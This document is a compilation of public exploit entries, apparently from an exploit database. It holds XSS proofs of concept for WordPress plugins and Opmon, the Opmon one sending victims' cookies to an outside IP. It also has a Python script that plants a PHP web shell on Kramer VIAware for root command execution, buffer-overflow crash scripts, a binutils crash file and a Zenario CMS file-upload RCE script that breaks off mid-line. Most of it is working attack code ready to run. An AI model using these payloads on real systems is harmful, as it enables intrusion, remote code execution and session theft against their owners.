<pre><code>Tittle:<br />WordPress Plugin Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting<br /><br />References:<br />CVE-2022-0901<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugins do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters<br /><br />Affects Plugins:<br />ad-inserter<br />ad-inserter-pro <br />Fixed in version 2.7.12<br /><br />Proof of Concept:<br />In a browser which does not encode characters: <br />https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab=\"><iframe/onload=alert(1)></iframe> <br /><br />Classification<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting<br /><br />References:<br />CVE-2022-0765<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly remove inline events from elements in the source translation strings before outputting them in the editor in the plugin admin panel, allowing any user with access to the plugin (Translator and Administrator by default) to add arbitrary javascript payloads to the source strings leading to a stored cross-site scripting (XSS) vulnerability.<br /><br />Affects Plugins:<br />loco-translate - Fixed in version 2.6.1<br /><br />Proof of Concept:<br />## POC1: via (edit-template) <br /><br />1.) Got to Plugin Loco Translate<br />2.) Enter Plugins Options<br />3.) Enter Edit Template Any Plugin<br />4.) Add New Message <br />5.) Edit Message<br />6.) Replace The Message With The Payload : ">'><details/open/ontoggle=alert('xss')><br />7.) Save<br />8.) Replicated<br /><br /><br />## POC2 via (example.po)<br /><br />1.) Got to Plugin Loco Translate<br />2.) Enter Plugins Options Any Plugin<br />3.) Upload PO options<br />3.) Load example.po<br /><br />Example.po<br /><br />msgid ""<br />msgstr ""<br />"Project-Id-Version: xss-tester\n"<br />"Report-Msgid-Bugs-To: \n"<br />"POT-Creation-Date: 2022-02-25 03:48+0000\n"<br />"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"<br />"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"<br />"Language-Team: \n"<br />"Language: \n"<br />"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"<br />"MIME-Version: 1.0\n"<br />"Content-Type: text/plain; charset=UTF-8\n"<br />"Content-Transfer-Encoding: 8bit\n"<br />"X-Generator: Loco https://localise.biz/\n"<br />"X-Loco-Version: 2.5.8; wp-5.9.1\n"<br />"X-Domain: xss-tester"<br />msgid "xss-tester"<br />msgstr ""<br />msgid "\">'><details/open/ontoggle=confirm('XSS')>"<br />msgstr "" <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/58838f51-323d-41e0-8c85-8e113dc2c587<br /><br /></code></pre>
<pre><code># Exploit Title: Remote Code Execution as Root on KRAMER VIAware<br /># Date: 31/03/2022<br /># Exploit Author: sharkmoos<br /># Vendor Homepage: https://www.kramerav.com/<br /># Software Link: https://www.kramerav.com/us/product/viaware<br /># Version: *<br /># Tested on: ViaWare Go (Linux)<br /># CVE : CVE-2021-35064, CVE-2021-36356<br /><br />import sys, urllib3<br />from requests import get, post<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br />def writeFile(host):<br /> headers = {<br /> "Host": f"{host}",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br /> "Accept": "text/html, */*",<br /> "Accept-Language": "en-GB,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Sec-Fetch-Dest": "empty",<br /> "Sec-Fetch-Mode": "cors",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Gpc": "1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /> # write php web shell into the Apache web directory<br /> data = {<br /> "radioBtnVal":"""<?php<br /> if(isset($_GET['cmd']))<br /> {<br /> system($_GET['cmd']);<br /> }?>""",<br /> "associateFileName": "/var/www/html/test.php"}<br /> post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False)<br /><br /><br />def getResult(host, cmd):<br /> # query the web shell, using rpm as sudo for root privileges<br /> file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False)<br /> pageText = file.text<br /> if len(pageText) < 1:<br /> result = "Command did not return a result"<br /> else:<br /> result = pageText<br /> return result<br /><br />def main(host):<br /> # upload malicious php<br /> writeFile(host)<br /> command = ""<br /> while command != "exit":<br /> # repeatedly query the webshell<br /> command = input("cmd:> ").strip()<br /> print(getResult(host, command))<br /> exit()<br /><br />if __name__ == "__main__":<br /> if len(sys.argv) == 2:<br /> main(sys.argv[1])<br /> else:<br /> print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")<br /> <br /></code></pre>
<pre><code># Exploit Title: Small HTTP Server Remote Buffer Overflow<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2022-04-07<br /># Vendor Homepage: http://smallsrv.com/<br /># Software Link : http://smallsrv.com/shttps_mgi.exe<br /># Tested Version: 3.06<br /># Vulnerability Type: Buffer Overflow Remote<br /># Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 <br /><br /># Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow<br /><br /><br />#!/usr/bin/env python<br /><br />from requests.exceptions import ConnectionError<br />from requests.compat import urljoin, quote_plus<br />import requests as req<br /><br />try:<br /> url = "http://192.168.1.99"<br /> term = "A" * 1600<br /> evilb = urljoin(url, quote_plus(term))<br /> resp = req.request(method='GET', url=evilb)<br /> print(resp.text)<br />except ConnectionError as e:<br /> print "Crashed!!"<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/837ec70bfb305b5c862ff9b04e70a318_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wisell<br />Vulnerability: Stack Buffer Overflow (SEH) <br />Description: The malware listens on TCP port 5277. Attackers who can reach the infected system can send a specially crafted packet triggering a stack buffer overflow overwriting the structured exception handler (SEH).<br />Family: Wisell<br />Type: PE32<br />MD5: 837ec70bfb305b5c862ff9b04e70a318<br />Vuln ID: MVID-2022-0541<br />Dropped files: <br />ASLR: Not Enabled<br />DEP: Not Enabled<br />SEH: Not Enabled<br />CFG: Not Enabled<br />Disclosure: 04/06/2022<br /><br />Memory Dump:<br />The stored exception information can be accessed via .ecxr.<br />(1598.1748): Stack buffer overflow - code c0000409 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=e748a741 edx=00000000 esi=00000000 edi=00000002<br />eip=7770ed3c esp=029bf7e8 ebp=029bf828 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:003> .ecxr<br />eax=00000149 ebx=0254f908 ecx=e748a741 edx=00000000 esi=00000001 edi=0000014a<br />eip=0040192e esp=029bfe98 ebp=029bff80 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />Backdoor_Win32_Wisell_837ec70bfb305b5c862ff9b04e70a318+0x192e:<br />0040192e 888c0537ffffff mov byte ptr [ebp+eax-0C9h],cl ss:002b:029c0000=??<br /><br />0:003> !exchain<br />029bf8a0: ntdll!_except_handler4+0 (77716a50)<br /> CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (777557ad)<br />029bffcc: 41414141<br />Invalid exception stack at 41414141<br /><br />Exploit/PoC:<br />python -c "print('A'*30000)" | nc64.exe x.x.x.x 5277<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Opmon 9.11 - Cross-site Scripting<br /># Date: 2021-06-01<br /># Exploit Author: p3tryx<br /># Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time<br /># Version: 9.11<br /># Tested on: Chrome, IE and Firefox<br /># CVE : CVE-2021-43009<br /><br /># URL POC:<br /><br /><script><br />alert(document.cookie);<br />var i=new Image;<br />i.src="http://192.168.0.18:8888/?"+document.cookie;<br /></script><br /><br />Url-encoded Payload<br /><br />%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E<br /><br />```<br />*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*<br /><https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter><br />[search]=%27};PAYLOAD&x=0&y=0<br /><br />*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*<br /><https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter><br />[search]=%27};<br />%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E<br />&x=0&y=0<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: binutils 2.37 - Objdump Segmentation Fault<br /># Date: 2021-11-03<br /># Exploit Author: p3tryx<br /># Vendor Homepage: https://www.gnu.org/software/binutils/<br /># Version: binutils 2.37<br /># Tested on: Ubuntu 18.04<br /># CVE : CVE-2021-43149<br /><br />Payload file<br /><br />```<br /><br />%223"\972\00\0083=Q333A111111114111113333<33A $$$\FF)$\80 1114<br />\00\80\99\00111111111111111-11111111111111111111111111111111111'111111111111111111<br />111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111<br /> $%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br />1))\FF)$1 1111<br /> $%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF<br />\00\00\00FFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111<br /> $%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111<br />1))\FF)$1 1111<br /> $%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111<br /> $%22622FF7FFFFFFFFF11111111111111111,1FF\83 \81 \8D 1111<br /> $%22622FF7FFFFFFFFFFFFFFF \FF<br /><br /> \00\80\99\00 1))\FF)$\80 1114<br />\00\80\99\0011111111111111)111111111111111111111111111111111111111111111111111111<br />1))\FF)$1 1111<br /> $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 { \8D 1111<br /> $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br />1))\FF)$1 1111<br /> $%2262211111111111111111111111111111111111111111111\00\00<br />\00111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF<br /> \81 \8D 111<br /> $%22622FFF1111111111111111111FF\83))\FF)$1 1111<br /> $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF \98 \81 \8D 1111<br /> $%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111<br />1))\FF)$1 1111<br /> $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111<br /> $%22622FF7FFFFFFFFF1111111111111111111FF\83 \81 \8D 1111<br /> $%22622FF7FFFFFFFFFFFFFFF \FF<br /><br /> \00\80\99 1))\FF)$\80 1114<br />\00\80\99\00111111111111111111111111111111111111111111111111111'111111111111111111<br />1111111111111111111111111111111>11111111111d\00\00\00111111111111111111<br />111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111<br /> $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1<br />1111<br /> $%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111<br />111111111111@111111111111111111d\001111<br />\0011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111<br />1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111<br /> $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111<br />1111111111111111111111111111\FF\FF1111111117111111111111111111111111111111111))\FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@1111111111111111111111111111111111111111111111111111\00\00<br />\0011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111<br />111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br />1))\FF)$1 1I11<br /> $%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111<br /> $%22622FF7FFFFFFFFF111111111111<br />111111111111111111111111111111111111111111111 1))\FF)$1 1111<br /> $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF<br /> \81 \8D 1111<br /> $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF<br /> \FF<br /><br /> \00\80\99\00 1))\FF)$\80 1111 \00\80\99\00a1))\FF)$1 1J11<br /> $%22@22FF11111FFFFFFFFFFFFFF222$)$<br /><br />```<br /><br />RUN the POC<br /><br /># binutils-2.37/binutils/objdump -T -D -x crash_2.37<br />ASAN:SIGSEGV<br />=================================================================<br />==27705==ERROR: AddressSanitizer: SEGV on unknown address<br />0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38<br />T0)<br />==27705==Hint: pc points to the zero page.<br /><br />AddressSanitizer can not provide additional info.<br />SUMMARY: AddressSanitizer: SEGV ??:0 ??<br />==27705==ABORTING<br /><br /></code></pre>
<pre><code># Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 04/02/2022<br /># Exploit Author: minhnq22<br /># Vendor Homepage: https://zenar.io/<br /># Software Link: https://zenar.io/download-page<br /># Version: 9.0.54156<br /># Tested on: Ubuntu 21.04<br /># CVE : CVE-2021–42171<br /># Python3<br /><br />import os<br />import sys<br />import json<br />import uuid<br />import base64<br />import requests<br /><br /># Input<br />if len(sys.argv) != 4:<br /> print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'")<br /> exit(1)<br /><br />TARGET = sys.argv[1]<br />USERNAME = sys.argv[2]<br />PASSWORD = sys.argv[3]<br /><br />## Attempt to log in<br />### Get cookie<br />resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D")<br /><br />### Grab the PHP session ID<br />PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]<br /><br />### Authen with cookie<br />resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D",<br /> headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID},<br /> data={"_validate": "true", "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'})<br /><br /># If login OK<br />print("Login OK!")<br /><br /><br />## Upload web shell<br />### Get sync info<br />resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload",<br /> headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"_fill": "true", "_values": ""})<br /><br />resp_body = json.loads(resp.text)<br /><br />password_sync = resp_body["_sync"]["password"]<br />iv_sync = resp_body["_sync"]["iv"]<br />cache_dir_sync = resp_body["_sync"]["cache_dir"]<br /><br />### Create blank docx file<br />file_content = b"UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0\nlMtuwjAQRfeV+g+Rt1Vi6KKqKgKLPpYtUukHGHsCVv2Sx7z+vhMCUVUBkQpsIiUz994zVsaD0dqa\nbAkRtXcl6xc9loGTXmk3K9nX5C1/ZBkm4ZQw3kHJNoBsNLy9GUw2ATAjtcOSzVMKT5yjnIMVWPgA\njiqVj1Ykeo0zHoT8FjPg973eA5feJXApT7UHGw5eoBILk7LXNX1uSCIYZNlz01hnlUyEYLQUiep8\n6dSflHyXUJBy24NzHfCOGhg/mFBXjgfsdB90NFEryMYipndhqYuvfFRcebmwpCxO2xzg9FWlJbT6\n2i1ELwGRztyaoq1Yod2e/ygHpo0BvDxF49sdDymR4BoAO+dOhBVMP69G8cu8E6Si3ImYGrg8Rmvd\nCZFoA6F59s/m2NqciqTOcfQBaaPjP8ber2ytzmngADHp039dm0jWZ88H9W2gQB3I5tv7bfgDAAD/\n/wMAUEsDBBQABgAIAAAAIQAekRq37wAAAE4CAAALAAgCX3JlbHMvLnJlbHMgogQCKKAAAgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArJLBasMw\nDEDvg/2D0b1R2sEYo04vY9DbGNkHCFtJTBPb2GrX/v082NgCXelhR8vS05PQenOcRnXglF3wGpZV\nDYq9Cdb5XsNb+7x4AJWFvKUxeNZw4gyb5vZm/cojSSnKg4tZFYrPGgaR+IiYzcAT5SpE9uWnC2ki\nKc/UYySzo55xVdf3mH4zoJkx1dZqSFt7B6o9Rb6GHbrOGX4KZj+xlzMtkI/C3rJdxFTqk7gyjWop\n9SwabDAvJZyRYqwKGvC80ep6o7+nxYmFLAmhCYkv+3xmXBJa/ueK5hk/Nu8hWbRf4W8bnF1B8wEA\nAP//AwBQSwMEFAAGAAgAAAAhAJdANEq+AgAAvQoAABEAAAB3b3JkL2RvY3VtZW50LnhtbKSW227b\nMAxA3wfsHwK/t7KdxEmNpkW7dkMfBhTr9gGKLNtCrQsk5bavH+X75q5w3BdbIs0jiiJpXd8eeTHb\nU22YFBsvuPS9GRVEJkxkG+/Xz68Xa29mLBYJLqSgG+9EjXd78/nT9SFOJNlxKuwMEMLEB0U2Xm6t\nihEyJKccm0vOiJZGpvaSSI5kmjJC0UHqBIV+4JcjpSWhxsB6X7DYY+PVOHIcR0s0PoCxAy4QybG2\n9NgxgrMhS3SF1kNQOAEEOwyDIWp+NipCzqsBaDEJBF4NSMtppDc2F00jhUPSahppPiStp5EG6cSH\nCS4VFaBMpebYwlRniGP9ulMXAFbYsi0rmD0B048aDGbidYJHYNUS+Dw5m7BCXCa0mCcNRW68nRZx\nbX/R2jvX48q+fjUWesz+K5OHujmUO0eaFhALKUzOVFvhfCoNlHkD2b+3iT0vmu8OKhhZLv9rTw9V\nKDvgGPfr+POi8vx9YuCPOBGHaC3GuPD3mo0nHLKwW3hSaHrBDUY2kAYQDgARoSMbfsNY1wxEugp1\nHDayNBpOdSqOw7rABiP72L/O9AAmsUl+FiVs4oqcLbY4x6ZNdEek5zm1bHEn3ouRyj5WCN+03KmO\nxj5Ge+ra2sFdMM5g1QXVL3LzMWdecqyg23ESP2VCarwtwCMojxlk+Kw8AfeERHGvckiPpdyd9cz1\nGO8GbkZbmZzcW4FuESus8RMkZeCHq6sguvdKKfxXrJPOo1V0N78PQRrDLSz5sfF8/zFaRHePreiB\npnhX2J4GObyhxD7rN+zKtbOX36CCFhGE4cJ3LMjGYLmGcWmtsu/YGVsJnSxYVJ9oluW2m26ltZJ3\n84KmPW1OcULhn7AKy2kqpe1Ns50tp/VyRBYGpEZhQqtvSjFcIr9pF8+4YII+M0tyF5NSi5otlsMq\nqKi7d978AQAA//8DAFBLAwQUAAYACAAAACEA1mSzUfQAAAAxAwAAHAAIAXdvcmQvX3JlbHMvZG9j\ndW1lbnQueG1sLnJlbHMgogQBKKAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACskstqwzAQ\nRfeF/oOYfS07fVBC5GxKIdvW/QBFHj+oLAnN9OG/r0hJ69BguvByrphzz4A228/BineM1HunoMhy\nEOiMr3vXKnipHq/uQRBrV2vrHSoYkWBbXl5sntBqTkvU9YFEojhS0DGHtZRkOhw0ZT6gSy+Nj4Pm\nNMZWBm1edYtyled3Mk4ZUJ4wxa5WEHf1NYhqDPgftm+a3uCDN28DOj5TIT9w/4zM6ThKWB1bZAWT\nMEtEkOdFVkuK0B+LYzKnUC<br />file_name = uuid.uuid4().hex<br />file = open(file_name + ".docx", "wb")<br />file.write(base64.decodebytes(file_content))<br />file.close()<br /><br />### Upload docx file<br />resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload",<br /> headers={"Cookie":PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"id":"", "fileUpload": 1, },<br /> files={"Filedata": open(file_name + ".docx", "rb")})<br /><br />### Get sync id file<br />resp_body = json.loads(resp.text)<br />id_sync = resp_body["id"]<br /><br /># Update database<br />resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload",<br /> headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'})<br /><br /># If upload OK<br />print("Upload file OK!")<br /><br /><br />## Change file extension<br />### Search ID file in Database<br />resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name, headers={"Cookie": PHPSESSID})<br />resp_body = json.loads(resp.text)<br /><br />file_id = resp_body["__item_sort_order__"]["0"]<br /><br />### Get sync info<br />resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id),<br /> headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"_fill": "true", "_values": ""})<br /><br />resp_body = json.loads(resp.text)<br /><br />password_sync = resp_body["_sync"]["password"]<br />iv_sync = resp_body["_sync"]["iv"]<br />cache_dir_sync = resp_body["_sync"]["cache_dir"]<br /><br />### Change to .php<br />resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id),<br /> headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + 